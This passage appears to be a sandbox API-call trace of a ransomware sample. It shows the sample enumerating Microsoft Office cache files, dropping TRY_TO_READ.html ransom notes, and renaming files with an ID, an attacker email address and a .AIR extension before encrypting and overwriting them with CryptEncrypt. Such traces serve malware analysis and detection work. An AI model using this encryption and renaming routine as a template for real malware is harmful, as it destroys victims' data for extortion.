lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0136.019] WriteFile (in: hFile=0x480, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0136.019] CloseHandle (hObject=0x480) returned 1 [0136.019] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0136.019] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383db0 | out: hHeap=0x2e0000) returned 1 [0136.019] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0136.019] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319c88 | out: hHeap=0x2e0000) returned 1 [0136.019] FindNextFileW (in: hFindFile=0x35df58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.fr", cAlternateFileName="")) returned 1 [0136.019] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.019] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.019] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ce8 [0136.019] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.019] GetLastError () returned 0x0 [0136.019] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x480 [0136.020] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385430 | out: hHeap=0x2e0000) returned 1 [0136.020] WriteFile (in: hFile=0x480, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0136.021] WriteFile (in: hFile=0x480, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0136.021] WriteFile (in: hFile=0x480, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0136.021] CloseHandle (hObject=0x480) returned 1 [0136.021] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385368 | out: hHeap=0x2e0000) returned 1 [0136.021] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383db0 | out: hHeap=0x2e0000) returned 1 [0136.021] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0136.021] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0136.021] FindNextFileW (in: hFindFile=0x35df58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40650500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x40650500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf0126df0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proofing.msi", cAlternateFileName="")) returned 1 [0136.021] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.021] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.021] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ce8 [0136.021] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.021] GetLastError () returned 0x0 [0136.021] FindNextFileW (in: hFindFile=0x35df58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x32b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proofing.xml", cAlternateFileName="")) returned 1 [0136.021] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.022] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.022] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ce8 [0136.022] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.022] GetLastError () returned 0x0 [0136.022] FindNextFileW (in: hFindFile=0x35df58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0136.022] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.022] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.022] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ce8 [0136.022] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.022] GetLastError () returned 0x0 [0136.022] FindNextFileW (in: hFindFile=0x35df58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x971d0bb0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x971d0bb0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971d0bb0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0136.022] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.022] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.022] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ce8 [0136.022] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.022] GetLastError () returned 0x0 [0136.022] FindNextFileW (in: hFindFile=0x35df58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x971d0bb0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x971d0bb0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971d0bb0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0136.022] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3854b8 [0136.022] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0136.022] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0136.022] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0136.022] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0136.022] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0136.023] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0136.023] GetProcessHeap () returned 0x2e0000 [0136.023] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x385560 [0136.023] lstrcpyW (in: lpString1=0x385560, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" [0136.023] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0136.023] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0136.025] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x480 [0136.025] GetProcessHeap () returned 0x2e0000 [0136.025] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385560 | out: hHeap=0x2e0000) returned 1 [0136.025] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=5884) returned 1 [0136.025] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x16fc [0136.025] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0136.025] GetProcessHeap () returned 0x2e0000 [0136.025] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0136.025] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0136.025] WriteFile (in: hFile=0x480, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0136.027] WriteFile (in: hFile=0x480, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0136.027] WriteFile (in: hFile=0x480, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0136.027] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x16fc) returned 0x385560 [0136.027] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x16fc) returned 0x386c68 [0136.027] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.027] ReadFile (in: hFile=0x480, lpBuffer=0x385560, nNumberOfBytesToRead=0x16fc, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x385560*, lpNumberOfBytesRead=0x2acf9c8*=0x16fc, lpOverlapped=0x0) returned 1 [0136.028] SetFilePointer (in: hFile=0x480, lDistanceToMove=-5884, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.028] WriteFile (in: hFile=0x480, lpBuffer=0x386c68*, nNumberOfBytesToWrite=0x16fc, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x386c68*, lpNumberOfBytesWritten=0x2acf9c8*=0x16fc, lpOverlapped=0x0) returned 1 [0136.028] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385560 | out: hHeap=0x2e0000) returned 1 [0136.028] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x386c68 | out: hHeap=0x2e0000) returned 1 [0136.028] CloseHandle (hObject=0x480) returned 1 [0136.028] GetProcessHeap () returned 0x2e0000 [0136.028] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0136.028] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0136.029] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0136.029] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3854b8 | out: hHeap=0x2e0000) returned 1 [0136.029] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385410 | out: hHeap=0x2e0000) returned 1 [0136.029] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385428 [0136.029] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0136.029] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0136.029] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0136.029] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0136.029] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", dwFileAttributes=0x80) returned 1 [0136.029] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 76 [0136.029] GetProcessHeap () returned 0x2e0000 [0136.029] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363a50 [0136.029] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" [0136.029] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0136.029] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0136.034] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x480 [0136.034] GetProcessHeap () returned 0x2e0000 [0136.034] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0136.034] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=811) returned 1 [0136.034] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x32b [0136.034] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0136.034] GetProcessHeap () returned 0x2e0000 [0136.034] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0136.034] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0136.035] WriteFile (in: hFile=0x480, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0136.036] WriteFile (in: hFile=0x480, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0136.036] WriteFile (in: hFile=0x480, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0136.036] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x32b) returned 0x387410 [0136.036] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x32b) returned 0x387748 [0136.036] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.036] ReadFile (in: hFile=0x480, lpBuffer=0x387410, nNumberOfBytesToRead=0x32b, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x387410*, lpNumberOfBytesRead=0x2acf9c8*=0x32b, lpOverlapped=0x0) returned 1 [0136.036] SetFilePointer (in: hFile=0x480, lDistanceToMove=-811, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.036] WriteFile (in: hFile=0x480, lpBuffer=0x387748*, nNumberOfBytesToWrite=0x32b, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x387748*, lpNumberOfBytesWritten=0x2acf9c8*=0x32b, lpOverlapped=0x0) returned 1 [0136.036] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x387410 | out: hHeap=0x2e0000) returned 1 [0136.036] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x387748 | out: hHeap=0x2e0000) returned 1 [0136.037] CloseHandle (hObject=0x480) returned 1 [0136.037] GetProcessHeap () returned 0x2e0000 [0136.037] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0136.037] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0136.037] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0136.037] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385428 | out: hHeap=0x2e0000) returned 1 [0136.037] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385368 | out: hHeap=0x2e0000) returned 1 [0136.037] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385428 [0136.038] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0136.038] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0136.038] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0136.038] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0136.038] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi", dwFileAttributes=0x80) returned 1 [0136.038] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 76 [0136.038] GetProcessHeap () returned 0x2e0000 [0136.038] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363a50 [0136.038] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" [0136.038] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0136.038] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0136.042] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x480 [0136.042] GetProcessHeap () returned 0x2e0000 [0136.042] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0136.042] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=868864) returned 1 [0136.042] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xd4200 [0136.042] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0136.042] GetProcessHeap () returned 0x2e0000 [0136.042] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0136.042] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0136.042] WriteFile (in: hFile=0x480, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0136.044] WriteFile (in: hFile=0x480, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0136.044] WriteFile (in: hFile=0x480, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 